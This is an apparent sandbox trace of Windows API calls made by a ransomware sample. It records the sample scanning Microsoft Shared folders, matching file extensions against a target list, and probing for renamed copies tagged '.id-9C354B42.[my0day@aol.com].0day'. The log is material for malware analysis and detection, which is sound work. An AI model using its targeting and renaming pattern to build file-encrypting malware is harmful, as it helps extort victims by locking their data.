[0054.121] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.121] lstrlenW (lpString=".zip") returned 4 [0054.121] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.121] lstrlenW (lpString=".rar") returned 4 [0054.121] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.121] lstrlenW (lpString=".bz2") returned 4 [0054.121] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.121] lstrlenW (lpString=".7z") returned 3 [0054.121] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.121] lstrlenW (lpString=".dbf") returned 4 [0054.121] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.121] lstrlenW (lpString=".1cd") returned 4 [0054.121] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0054.121] lstrlenW (lpString=".jpg") returned 4 [0054.121] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.121] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0054.121] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0054.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.122] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0054.122] CloseHandle (hObject=0x234) returned 1 [0054.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0054.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.123] lstrlenW (lpString=".doc") returned 4 [0054.123] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.123] lstrlenW (lpString=".docx") returned 5 [0054.123] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.123] lstrlenW (lpString=".pdf") returned 4 [0054.123] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.123] lstrlenW (lpString=".xls") returned 4 [0054.123] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.123] lstrlenW (lpString=".xlsx") returned 5 [0054.123] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.123] lstrlenW (lpString=".ppt") returned 4 [0054.123] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.123] lstrlenW (lpString=".zip") returned 4 [0054.123] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.123] lstrlenW (lpString=".rar") returned 4 [0054.123] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.123] lstrlenW (lpString=".bz2") returned 4 [0054.123] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.123] lstrlenW (lpString=".7z") returned 3 [0054.123] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.123] lstrlenW (lpString=".dbf") returned 4 [0054.123] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.123] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".1cd") returned 4 [0054.124] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".jpg") returned 4 [0054.124] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".doc") returned 4 [0054.124] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.124] lstrlenW (lpString=".docx") returned 5 [0054.124] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.124] lstrlenW (lpString=".pdf") returned 4 [0054.124] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.124] lstrlenW (lpString=".xls") returned 4 [0054.124] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.124] lstrlenW (lpString=".xlsx") returned 5 [0054.124] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.124] lstrlenW (lpString=".ppt") returned 4 [0054.124] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".zip") returned 4 [0054.124] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.124] lstrlenW (lpString=".rar") returned 4 [0054.124] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.124] lstrlenW (lpString=".bz2") returned 4 [0054.124] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.124] lstrlenW (lpString=".7z") returned 3 [0054.124] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".dbf") returned 4 [0054.124] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.124] lstrlenW (lpString=".1cd") returned 4 [0054.125] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0054.125] lstrlenW (lpString=".jpg") returned 4 [0054.125] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.125] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0054.125] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0054.125] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.125] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4096) returned 1 [0054.125] CloseHandle (hObject=0x234) returned 1 [0054.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0054.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.125] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString=".doc") returned 4 [0054.126] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.126] lstrlenW (lpString=".docx") returned 5 [0054.126] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.126] lstrlenW (lpString=".pdf") returned 4 [0054.126] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.126] lstrlenW (lpString=".xls") returned 4 [0054.126] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.126] lstrlenW (lpString=".xlsx") returned 5 [0054.126] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.126] lstrlenW (lpString=".ppt") returned 4 [0054.126] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString=".zip") returned 4 [0054.126] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.126] lstrlenW (lpString=".rar") returned 4 [0054.126] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.126] lstrlenW (lpString=".bz2") returned 4 [0054.126] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.126] lstrlenW (lpString=".7z") returned 3 [0054.126] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString=".dbf") returned 4 [0054.126] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString=".1cd") returned 4 [0054.126] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.126] lstrlenW (lpString=".jpg") returned 4 [0054.126] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString=".doc") returned 4 [0054.127] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.127] lstrlenW (lpString=".docx") returned 5 [0054.127] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.127] lstrlenW (lpString=".pdf") returned 4 [0054.127] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.127] lstrlenW (lpString=".xls") returned 4 [0054.127] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.127] lstrlenW (lpString=".xlsx") returned 5 [0054.127] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.127] lstrlenW (lpString=".ppt") returned 4 [0054.127] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString=".zip") returned 4 [0054.127] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.127] lstrlenW (lpString=".rar") returned 4 [0054.127] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.127] lstrlenW (lpString=".bz2") returned 4 [0054.127] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.127] lstrlenW (lpString=".7z") returned 3 [0054.127] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString=".dbf") returned 4 [0054.127] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString=".1cd") returned 4 [0054.127] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0054.127] lstrlenW (lpString=".jpg") returned 4 [0054.127] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.128] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0054.128] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0054.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.128] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=193024) returned 1 [0054.128] CloseHandle (hObject=0x234) returned 1 [0054.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20 [0054.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.128] lstrlenW (lpString=".doc") returned 4 [0054.128] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0054.128] lstrlenW (lpString=".docx") returned 5 [0054.128] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0054.129] lstrlenW (lpString=".pdf") returned 4 [0054.129] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString=".xls") returned 4 [0054.129] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString=".xlsx") returned 5 [0054.129] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0054.129] lstrlenW (lpString=".ppt") returned 4 [0054.129] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString=".zip") returned 4 [0054.129] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString=".rar") returned 4 [0054.129] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString=".bz2") returned 4 [0054.129] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0054.129] lstrlenW (lpString=".7z") returned 3 [0054.129] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString=".dbf") returned 4 [0054.129] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString=".1cd") returned 4 [0054.129] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString=".jpg") returned 4 [0054.129] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.129] lstrlenW (lpString=".doc") returned 4 [0054.129] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0054.129] lstrlenW (lpString=".docx") returned 5 [0054.129] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0054.129] lstrlenW (lpString=".pdf") returned 4 [0054.130] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0054.130] lstrlenW (lpString=".xls") returned 4 [0054.130] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0054.130] lstrlenW (lpString=".xlsx") returned 5 [0054.130] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0054.130] lstrlenW (lpString=".ppt") returned 4 [0054.130] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.130] lstrlenW (lpString=".zip") returned 4 [0054.130] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0054.130] lstrlenW (lpString=".rar") returned 4 [0054.130] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0054.130] lstrlenW (lpString=".bz2") returned 4 [0054.130] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0054.130] lstrlenW (lpString=".7z") returned 3 [0054.130] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.130] lstrlenW (lpString=".dbf") returned 4 [0054.130] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.130] lstrlenW (lpString=".1cd") returned 4 [0054.130] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0054.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0054.130] lstrlenW (lpString=".jpg") returned 4 [0054.130] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0054.131] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0054.131] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0054.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.131] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0054.131] CloseHandle (hObject=0x234) returned 1 [0054.131] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0054.131] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.131] lstrlenW (lpString=".doc") returned 4 [0054.131] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.131] lstrlenW (lpString=".docx") returned 5 [0054.131] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.132] lstrlenW (lpString=".pdf") returned 4 [0054.132] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.132] lstrlenW (lpString=".xls") returned 4 [0054.132] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.132] lstrlenW (lpString=".xlsx") returned 5 [0054.132] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.132] lstrlenW (lpString=".ppt") returned 4 [0054.132] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString=".zip") returned 4 [0054.132] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.132] lstrlenW (lpString=".rar") returned 4 [0054.132] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.132] lstrlenW (lpString=".bz2") returned 4 [0054.132] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.132] lstrlenW (lpString=".7z") returned 3 [0054.132] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString=".dbf") returned 4 [0054.132] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString=".1cd") returned 4 [0054.132] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString=".jpg") returned 4 [0054.132] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.132] lstrlenW (lpString=".doc") returned 4 [0054.132] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.132] lstrlenW (lpString=".docx") returned 5 [0054.132] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.132] lstrlenW (lpString=".pdf") returned 4 [0054.133] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.133] lstrlenW (lpString=".xls") returned 4 [0054.133] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.133] lstrlenW (lpString=".xlsx") returned 5 [0054.133] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.133] lstrlenW (lpString=".ppt") returned 4 [0054.133] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.133] lstrlenW (lpString=".zip") returned 4 [0054.133] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.133] lstrlenW (lpString=".rar") returned 4 [0054.133] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.133] lstrlenW (lpString=".bz2") returned 4 [0054.133] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.133] lstrlenW (lpString=".7z") returned 3 [0054.133] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.133] lstrlenW (lpString=".dbf") returned 4 [0054.133] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.133] lstrlenW (lpString=".1cd") returned 4 [0054.133] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0054.133] lstrlenW (lpString=".jpg") returned 4 [0054.133] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.133] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0054.133] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0054.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.134] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0054.134] CloseHandle (hObject=0x234) returned 1 [0054.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0054.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff 